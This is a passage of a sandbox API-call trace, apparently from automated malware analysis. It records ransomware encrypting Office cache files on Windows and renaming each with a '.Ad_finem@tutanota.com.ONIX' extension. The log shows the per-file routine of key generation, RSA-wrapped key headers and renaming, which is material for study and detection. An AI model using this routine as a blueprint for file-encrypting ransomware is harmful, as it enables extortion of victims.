RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x709768) returned 0x3680020 [0110.393] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x709768) returned 0x3d90020 [0110.393] SetFilePointer (in: hFile=0x494, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.393] ReadFile (in: hFile=0x494, lpBuffer=0x3680020, nNumberOfBytesToRead=0x709768, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesRead=0x367f44c*=0x709768, lpOverlapped=0x0) returned 1 [0111.135] UnlockFile (hFile=0x494, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x709768, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0111.136] CloseHandle (hObject=0x494) returned 1 [0111.201] GetProcessHeap () returned 0x410000 [0111.201] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6b80 | out: hHeap=0x410000) returned 1 [0111.201] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0111.203] GetProcessHeap () returned 0x410000 [0111.203] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0111.203] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0111.203] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0111.203] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0111.203] FindNextFileW (in: hFindFile=0x48ecb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8238e540, ftCreationTime.dwHighDateTime=0x1cb147f, ftLastAccessTime.dwLowDateTime=0x8238e540, ftLastAccessTime.dwHighDateTime=0x1cb147f, ftLastWriteTime.dwLowDateTime=0xa5ddcc70, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x228df5c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OWOW32WW.cab", cAlternateFileName="")) returned 1 [0111.203] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0111.203] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0111.203] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458a78 [0111.203] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0111.203] GetLastError () returned 0x0 [0111.203] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x494 [0111.279] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0111.279] LockFile (hFile=0x494, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x228df5c, nNumberOfBytesToLockHigh=0x0) returned 1 [0111.279] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0111.279] ReadFile (in: hFile=0x494, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0111.281] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0111.281] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0111.282] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0111.282] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0111.282] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab", dwFileAttributes=0x80) returned 1 [0111.282] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 76 [0111.282] GetProcessHeap () returned 0x410000 [0111.282] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x108) returned 0x467908 [0111.282] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" [0111.282] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0111.282] GetFileSizeEx (in: hFile=0x494, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=36233052) returned 1 [0111.282] SetFilePointer (in: hFile=0x494, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x228df5c [0111.282] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0111.282] GetProcessHeap () returned 0x410000 [0111.282] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d6b80 [0111.282] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x100) returned 1 [0111.282] WriteFile (in: hFile=0x494, lpBuffer=0x4d6b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d6b80*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0111.284] WriteFile (in: hFile=0x494, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0111.285] WriteFile (in: hFile=0x494, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0111.286] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x228df5c) returned 0x3680020 [0111.287] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x228df5c) returned 0x5910020 [0111.288] SetFilePointer (in: hFile=0x494, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.288] ReadFile (in: hFile=0x494, lpBuffer=0x3680020, nNumberOfBytesToRead=0x228df5c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesRead=0x367f44c*=0x228df5c, lpOverlapped=0x0) returned 1 [0113.820] UnlockFile (hFile=0x494, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x228df5c, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0113.820] CloseHandle (hObject=0x494) returned 1 [0113.821] GetProcessHeap () returned 0x410000 [0113.821] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6b80 | out: hHeap=0x410000) returned 1 [0113.821] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0113.823] GetProcessHeap () returned 0x410000 [0113.823] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0113.823] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0113.823] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0113.823] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0113.823] FindNextFileW (in: hFindFile=0x48ecb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7bd91af0, ftCreationTime.dwHighDateTime=0x1cb07b2, ftLastAccessTime.dwLowDateTime=0x7bd91af0, ftLastAccessTime.dwHighDateTime=0x1cb07b2, ftLastWriteTime.dwLowDateTime=0xa8bafbc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x165510, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PidGenX.dll", cAlternateFileName="")) returned 1 [0113.823] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0113.823] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0113.823] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458a78 [0113.823] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0113.823] GetLastError () returned 0x0 [0113.824] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x494 [0113.824] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0113.824] LockFile (hFile=0x494, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x165510, nNumberOfBytesToLockHigh=0x0) returned 1 [0113.824] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0113.824] ReadFile (in: hFile=0x494, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0113.826] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.826] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0113.826] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0113.826] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0113.826] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll", dwFileAttributes=0x80) returned 1 [0113.826] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 75 [0113.826] GetProcessHeap () returned 0x410000 [0113.826] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x106) returned 0x467908 [0113.827] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll" [0113.827] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0113.827] GetFileSizeEx (in: hFile=0x494, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=1463568) returned 1 [0113.827] SetFilePointer (in: hFile=0x494, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x165510 [0113.827] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0113.827] GetProcessHeap () returned 0x410000 [0113.827] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d6b80 [0113.827] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x100) returned 1 [0113.827] WriteFile (in: hFile=0x494, lpBuffer=0x4d6b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d6b80*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0113.829] WriteFile (in: hFile=0x494, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0113.830] WriteFile (in: hFile=0x494, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0113.831] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x165510) returned 0x2b30020 [0113.831] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x165510) returned 0x3680020 [0113.832] SetFilePointer (in: hFile=0x494, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.832] ReadFile (in: hFile=0x494, lpBuffer=0x2b30020, nNumberOfBytesToRead=0x165510, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2b30020*, lpNumberOfBytesRead=0x367f44c*=0x165510, lpOverlapped=0x0) returned 1 [0113.908] UnlockFile (hFile=0x494, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x165510, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0113.908] CloseHandle (hObject=0x494) returned 1 [0113.909] GetProcessHeap () returned 0x410000 [0113.909] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6b80 | out: hHeap=0x410000) returned 1 [0113.909] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0113.911] GetProcessHeap () returned 0x410000 [0113.911] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0113.911] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0113.911] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0113.911] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0113.911] FindNextFileW (in: hFindFile=0x48ecb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2a2397e0, ftCreationTime.dwHighDateTime=0x1cbe19a, ftLastAccessTime.dwLowDateTime=0x2a2397e0, ftLastAccessTime.dwHighDateTime=0x1cbe19a, ftLastWriteTime.dwLowDateTime=0xa8bafbc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0xaec3a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pkeyconfig-office.xrm-ms", cAlternateFileName="PKEYCO~1.XRM")) returned 1 [0113.911] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0113.911] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0113.911] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458a78 [0113.911] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0113.911] GetLastError () returned 0x0 [0113.911] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x494 [0113.912] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0113.912] LockFile (hFile=0x494, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xaec3a, nNumberOfBytesToLockHigh=0x0) returned 1 [0113.912] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0113.912] ReadFile (in: hFile=0x494, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0113.914] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.914] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0113.914] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0113.914] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0113.914] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms", dwFileAttributes=0x80) returned 1 [0113.914] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 88 [0113.914] GetProcessHeap () returned 0x410000 [0113.914] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x120) returned 0x449878 [0113.914] lstrcpyW (in: lpString1=0x449878, lpString2="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" [0113.914] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0113.914] GetFileSizeEx (in: hFile=0x494, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=715834) returned 1 [0113.914] SetFilePointer (in: hFile=0x494, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0xaec3a [0113.914] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0113.914] GetProcessHeap () returned 0x410000 [0113.914] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d6b80 [0113.915] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x100) returned 1 [0113.915] WriteFile (in: hFile=0x494, lpBuffer=0x4d6b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d6b80*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0113.917] WriteFile (in: hFile=0x494, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0113.918] WriteFile (in: hFile=0x494, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0113.919] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xaec3a) returned 0x2680020 [0113.919] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xaec3a) returned 0x2b30020 [0113.919] SetFilePointer (in: hFile=0x494, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.919] ReadFile (in: hFile=0x494, lpBuffer=0x2680020, nNumberOfBytesToRead=0xaec3a, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2680020*, lpNumberOfBytesRead=0x367f44c*=0xaec3a, lpOverlapped=0x0) returned 1 [0113.953] UnlockFile (hFile=0x494, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xaec3a, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0113.953] CloseHandle (hObject=0x494) returned 1 [0113.953] GetProcessHeap () returned 0x410000 [0113.953] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6b80 | out: hHeap=0x410000) returned 1 [0113.953] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0113.956] GetProcessHeap () returned 0x410000 [0113.956] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449878 | out: hHeap=0x410000) returned 1 [0113.956] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0113.956] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0113.956] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473118 | out: hHeap=0x410000) returned 1 [0113.956] FindNextFileW (in: hFindFile=0x48ecb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7c1614f0, ftCreationTime.dwHighDateTime=0x1cb148c, ftLastAccessTime.dwLowDateTime=0x7c1614f0, ftLastAccessTime.dwHighDateTime=0x1cb148c, ftLastWriteTime.dwLowDateTime=0xa60fd8f0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0xa4c400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrjProrWW.msi", cAlternateFileName="PRJPRO~1.MSI")) returned 1 [0113.956] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0113.956] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0113.956] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458a78 [0113.956] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0113.956] GetLastError () returned 0x0 [0113.956] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi" (normalized: "c:\\msocache\\all 